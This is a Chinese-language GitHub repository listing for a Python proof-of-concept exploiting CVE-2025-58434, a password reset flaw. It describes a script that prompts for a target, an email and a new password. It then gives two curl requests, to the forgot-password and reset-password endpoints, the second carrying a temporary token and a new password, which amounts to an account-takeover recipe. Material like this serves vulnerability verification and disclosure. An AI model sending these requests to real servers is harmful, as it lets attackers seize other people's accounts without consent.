mananispiwpiw/CVE-2025-58434-PoC

GitHub: mananispiwpiw/CVE-2025-58434-PoC

一款用于复现和验证 CVE-2025-58434 密码重置接口安全漏洞的 Python 概念验证脚本。

Stars: 0 | Forks: 0

# CVE-2025-58434 PoC 用于触发 `POST /api/v1/account/forgot-password` 的 Python 概念验证脚本。 ## 贡献者 - `zaddy6` (Isaac David) - `arthurgervais` (Arthur Gervais) ## 详情 - `CVE-2025-58434` 的 PoC - 参考: https://github.com/advisories/GHSA-wgpv-6j63-x5ph ## 文件 - `poc.py`: 提示输入目标机器的 URL/IP、使用裸主机/IP 时的可选协议、目标邮箱和密码;然后发送请求并打印 HTTP 状态码、响应头和响应体,输出效果类似于 `curl -i` ## 使用方法 运行: ``` python3 poc.py ``` 然后提供以下信息: - 目标机器的 URL/IP,例如 `10.10.11.10`、`http://10.10.11.10` 或 `https://target.example` - 如果提示输入裸主机/IP 的协议,则进行选择 - email 地址 - 密码 ## 等效的 curl 命令 ### 第一次请求 ``` curl -i -X POST https:///api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d '{"user":{"email":""}}' ``` ### 第二次请求 ``` curl -i -X POST https:///api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d '{ "user":{ "email":"", "tempToken":"", "password":"NewSecurePassword123!" } }' ```
标签:API安全, CISA项目, CVE-2025-58434, CVE复现, EXP, HTTP请求, JSON输出, Linux取证, Maven, PoC, Web安全, 密码重置, 忘记密码, 暴力破解, 漏洞验证, 网络安全, 蓝队分析, 账户接管, 逆向工具, 隐私保护